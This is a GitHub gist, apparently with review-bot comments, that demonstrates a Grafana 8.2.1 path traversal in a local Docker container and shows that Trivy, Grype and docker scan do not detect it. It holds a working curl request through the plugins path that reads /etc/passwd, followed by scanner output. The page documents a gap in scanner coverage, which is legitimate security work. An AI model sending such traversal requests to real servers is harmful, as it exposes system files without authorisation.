Last active
December 14, 2021 00:41
Gist: stefanlasiewski/eae57ed6d5c0aaf4ba4797c8ac796e30
Revisions
stefanlasiewski revised this gist
Dec 14, 2021. 1 changed file with 37 additions and 0 deletions.
@@ -38,6 +38,17 @@ stefanl@stefanl:~ $ trivy image --severity HIGH,CRITICAL grafana/grafana:8.2.1 | | | CVE-2021-42384 | | | | busybox: use-after-free in | | | CVE-2021-42385 | | | | busybox: use-after-free in | | | CVE-2021-42386 | | | | busybox: use-after-free in | stefanl@stefanl:~ $ trivy -v Version: 0.21.2 Vulnerability DB: Type: Full Version: 1 UpdatedAt: 2021-12-13 18:39:56.916824175 +0000 UTC NextUpdate: 2021-12-14 00:39:56.916823575 +0000 UTC DownloadedAt: 2021-12-13 20:06:06.505672 +0000 UTC stefanl@stefanl:~ ``` ## Anchore Grype @@ -71,6 +82,20 @@ ssl_client 1.33.1-r3 1.33.1-r ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High stefanl@stefanl:~ $ stefanl@stefanl:~ $ grype version Application: grype Version: 0.27.0 Syft Version: v0.32.0 BuildDate: 2021-12-08T22:17:50Z GitCommit: e62186725b8bfe3faddb78fa82b1ca44c747c9b6 GitTreeState: clean Platform: darwin/amd64 GoVersion: go1.16.10 Compiler: gc Supported DB Schema: 3 stefanl@stefanl:~ $ ``` ## Docker Scan @@ -152,5 +177,17 @@ Tested 614 dependencies for known issues, found 3 issues. Tested 3 projects, 1 contained vulnerable paths. stefanl@stefanl:~ $ stefanl@stefanl:~ $ docker scan --version Version: v0.11.0 Git commit: c8da19f Provider: Snyk (1.563.0) stefanl@stefanl:~ $ docker --version Docker version 20.10.11, build dea9396 stefanl@stefanl:~ $ docker scan --version Version: v0.11.0 Git commit: c8da19f Provider: Snyk (1.563.0) stefanl@stefanl:~ $ ```
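Review bot: in the third hunk (@@ -152,5 +177,17 @@) the `docker scan --version` block appears twice, once before and once after `docker --version`; drop one copy. In the first hunk the `trivy -v` output is the most valuable addition, because it records the vulnerability DB timestamps (`UpdatedAt: 2021-12-13 18:39:56`, `NextUpdate: 2021-12-14 00:39:56`), and the DB date is what decides whether a scanner can know about a fresh advisory. The `grype version` block in the second hunk records only the tool and Syft versions, so consider also capturing `grype db status` so the Grype result is dated the same way, and since `docker scan --version` shows `Provider: Snyk (1.563.0)` without a DB date, state the scan date in the prose so the "not detected" result reads as a snapshot rather than a permanent gap.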
stefanlasiewski renamed this gist
Dec 14, 2021. 1 changed file with 0 additions and 0 deletions.
File renamed without changes.
stefanlasiewski revised this gist
Dec 14, 2021. 1 changed file with 1 addition and 1 deletion.
@@ -40,7 +40,7 @@ stefanl@stefanl:~ $ trivy image --severity HIGH,CRITICAL grafana/grafana:8.2.1 | | | CVE-2021-42386 | | | | busybox: use-after-free in | ``` ## Anchore Grype ``` stefanl@stefanl:~ $ grype -q grafana/grafana:8.2.1 |grep -i CVE
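Review bot: the one-line change in this hunk leaves the heading as `## Anchore Grype`, which now matches `## Aqua Trivy` and `## Docker Scan`, so the three scanner sections sit at the same level under the `# However it isn't detected by ...` heading; no further change needed here.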
stefanlasiewski created this gist
Dec 14, 2021.
@@ -0,0 +1,156 @@ # This container is vulnerable: ``` stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1 497f2c35813fa2f035252f241e40ef88ad24f458f5989f2e876940b0c00da698 stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd | head -3 % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1230 100 1230 0 0 400k 0 --:--:-- --:--:-- --:--:-- 400k root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin stefanl@stefanl:~ $ ``` # However it isn't detected by `docker scan` (which uses Snyk), Aqua Trivy or Anchore Grype. ## Aqua Trivy ``` stefanl@stefanl:~ $ trivy image --severity HIGH,CRITICAL grafana/grafana:8.2.1 |grep CVE | busybox | CVE-2021-42378 | HIGH | 1.33.1-r3 | 1.33.1-r6 | busybox: use-after-free in | | | CVE-2021-42379 | | | | busybox: use-after-free in | | | CVE-2021-42380 | | | | busybox: use-after-free in | | | CVE-2021-42381 | | | | busybox: use-after-free in | | | CVE-2021-42382 | | | | busybox: use-after-free in | | | CVE-2021-42383 | | | | busybox: use-after-free in | | | CVE-2021-42384 | | | | busybox: use-after-free in | | | CVE-2021-42385 | | | | busybox: use-after-free in | | | CVE-2021-42386 | | | | busybox: use-after-free in | | ssl_client | CVE-2021-42378 | | | | busybox: use-after-free in | | | CVE-2021-42379 | | | | busybox: use-after-free in | | | CVE-2021-42380 | | | | busybox: use-after-free in | | | CVE-2021-42381 | | | | busybox: use-after-free in | | | CVE-2021-42382 | | | | busybox: use-after-free in | | | CVE-2021-42383 | | | | busybox: use-after-free in | | | CVE-2021-42384 | | | | busybox: use-after-free in | | | CVE-2021-42385 | | | | busybox: use-after-free in | | | CVE-2021-42386 | | | | busybox: use-after-free in | ``` # Anchore Grype 
``` stefanl@stefanl:~ $ grype -q grafana/grafana:8.2.1 |grep -i CVE busybox 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium busybox 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High github.com/google/flatbuffers v1.12.0 CVE-2020-35864 High github.com/grafana/loki v1.6.2-0.20210520072447-15d417efe103 CVE-2021-36156 Medium github.com/prometheus/prometheus v1.8.2-0.20210621150501-ff58416a0b02 CVE-2019-3826 Medium google.golang.org/protobuf v1.27.1 CVE-2015-5237 High ssl_client 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium ssl_client 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High stefanl@stefanl:~ $ ``` ## Docker Scan ``` stefanl@stefanl:~ $ docker scan --severity medium grafana/grafana:8.2.1 Testing grafana/grafana:8.2.1... Organization: --- Package manager: apk Project name: docker-image|grafana/grafana Docker image: grafana/grafana:8.2.1 Platform: linux/amd64 Base image: grafana/grafana:8.2.1 Licenses: enabled ✓ Tested 34 dependencies for known issues, no vulnerable paths found. 
Base Image Vulnerabilities Severity grafana/grafana:8.2.1 11 0 critical, 0 high, 0 medium, 11 low Recommendations for base image upgrade: Minor upgrades Base Image Vulnerabilities Severity grafana/grafana:8.3.2 0 0 critical, 0 high, 0 medium, 0 low ------------------------------------------------------- Testing grafana/grafana:8.2.1... Organization: --- Package manager: gomodules Target file: /usr/share/grafana/bin/grafana-cli Project name: github.com/grafana/grafana Docker image: grafana/grafana:8.2.1 Licenses: enabled ✓ Tested 279 dependencies for known issues, no vulnerable paths found. ------------------------------------------------------- Testing grafana/grafana:8.2.1... ✗ Medium severity vulnerability found in github.com/cortexproject/cortex/pkg/tenant Description: Directory Traversal Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMCORTEXPROJECTCORTEXPKGTENANT-1536565 Introduced through: github.com/cortexproject/cortex/pkg/tenant@#d382e1d80eaf From: github.com/cortexproject/cortex/pkg/tenant@#d382e1d80eaf Fixed in: 1.10.0-rc.1 ✗ High severity vulnerability found in github.com/ua-parser/uap-go/uaparser Description: Regular Expression Denial of Service (ReDoS) Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUAPARSERUAPGOUAPARSER-1569599 Introduced through: github.com/ua-parser/uap-go/uaparser@#daf92ba38329 From: github.com/ua-parser/uap-go/uaparser@#daf92ba38329 ✗ High severity vulnerability found in github.com/russellhaering/goxmldsig Description: Denial of Service (DoS) Info: https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-608301 Introduced through: github.com/russellhaering/[email protected] 
From: github.com/russellhaering/[email protected] Fixed in: 1.1.1 Organization: --- Package manager: gomodules Target file: /usr/share/grafana/bin/grafana-server Project name: github.com/grafana/grafana Docker image: grafana/grafana:8.2.1 Licenses: enabled Tested 614 dependencies for known issues, found 3 issues. Tested 3 projects, 1 contained vulnerable paths. stefanl@stefanl:~ $ ```
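Review bot: the first `curl` (the `.../public/plugins/mysql/../../../../../VERSION` request) is followed directly by the next prompt, so the transcript does not show whether that request returned anything; include its response (body or HTTP status) so the evidence stands on its own, and add `-s` to the second curl so the progress meter (`% Total % Received % Xferd ...`) does not clutter the `/etc/passwd` output. In the `## Docker Scan` section Snyk reports a `Medium severity vulnerability ... Directory Traversal` in `github.com/cortexproject/cortex/pkg/tenant`; that is an unrelated Go module finding, not the plugin path traversal demonstrated above, so say so in the prose, otherwise a reader may take it as a detection. Also link the Grafana advisory for the demonstrated issue in the `# This container is vulnerable:` section so readers can check each scanner's database for it, and note that `# Anchore Grype` is a top-level heading while `## Aqua Trivy` and `## Docker Scan` are second-level.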